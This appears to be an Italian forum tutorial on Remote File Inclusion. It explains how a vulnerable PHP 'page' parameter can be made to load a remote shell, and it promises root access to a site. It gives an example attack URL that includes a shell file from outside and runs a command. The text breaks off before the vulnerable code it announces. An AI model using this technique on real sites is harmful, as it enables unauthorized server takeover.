-----------Guida al Remote File Inclusion---------------------------------
*********************
DISCLAMER/AVVERTENZE: Tutto il contenuto di questa guida è stato scritto da Abe, qualsiasi somiglianza a testi o articoli presenti sul web è puramente casuale, e quindi non è da ritenersi una copia o rielaborazione di niente!
Abe concede il permesso di copiare totalmente o parzialmente la guida a patto che citi la fonte!
*********************
__________________________________________________ _______
TUTTO QUELLO CHE VIENE DESCRITTO E SPIEGATO IN QUESTA GUIDA E' DA RITENERSI ESCLUSIVAMENTE A PURO SCOPO INFORMATIVO
E L'AUTORE DI QUESTA GUIDA NON SI ASSUME NESSUNA RESPONSABILITA'RIGUARDO ALL' USO IMPROPRIO CHE GLI UTENTI POSSONO FARNE.
LA PRESENTE GUIDA E' STATA CREATA PER FAR CONOSCERE AGLI UTENTI MENO ESPERTI
LE VARIE TECNICHE CHE I LAMER POSSONO UTILIZZARE PER ATTACCARE IL VOSTRO SISTEMA,E IMPARARE DUNQUE A RIPARARE QUESTI BUG.
__________________________________________________ ________
-----------------------------------------------
CONOSCENZE NECESSARIE PER COMPRENDERE LA GUIDA:
-----------------------------------------------
-HTML
-BASE DI HACKING
(Se non sapete nemmeno cosa sia un exploit, e vi chiedete che cosa sono le vulnerabilità,potete chiudere)
-PHP
================================================== ====
Difficoltà:
Dipende da voi, se avete le conoscenze elencate precedentemente sarà una passeggiata,
in caso contrario la difficoltà sarà direttamente proporzionale al vostro grado di conoscenza!
================================================== ====
Rischio:
Dipende anch'esso da voi, in questa guida vi spiegherò come ottenere l' accesso root in un sito,
ma quando sarete dentro al server, deciderete voi cosa fare!
Con le dovute precauzioni il rischio sarà quasi inesistente, ma se in caso contrario danneggerete il server,
vi dovrete assumere le colpe dell'azione!
Potete scegliere una delle due opzioni, se dovete fare lamerate potete anche chiudere questa pagina perchè non voglio
lamer in circolazione, quelli che ci sono bastano e avanzano!
Se siete solo in cerca di informazioni e di tecniche potete andare tranquilli!
================================================== =====
----------------------------------------------------------------------------------------
NOTA: Questo bug non è molto recente, quindi se avete difficoltà a trovare i siti vulnerabili non date testate al vostro monitor!
----------------------------------------------------------------------------------------
Il Remote File Inclusion (RFI) è una tecnica che consiste nell' includere un file maligno da remoto (di solito una Shell)
all'interno di un server,sfruttando la vulnerabilità di una variabile...
Ovviamente avremo bisogno di una shell uppata in formato txt (non php o girerebbe in locale!)
Facciamo un esempio:
Mettiamo caso che "http://sitovittima.it" sia vulnerabile all 'RFI
noi faremo così:
----------------------------------------------------------------------
http://sitovittima.it/index.php?page=SHELL.txt?cmd=ls
----------------------------------------------------------------------
In questo sito l' errore si trova nella index.php e la variabile vulneraile è page,che permette di inserire un link esterno,
in questo caso quello della Shell.
Come Funziona l'attacco?
è semplice, nell' index.php c'è un codice del genere:
Codice:
Messaggi
Crediti
Registrato Dal
Età
Località
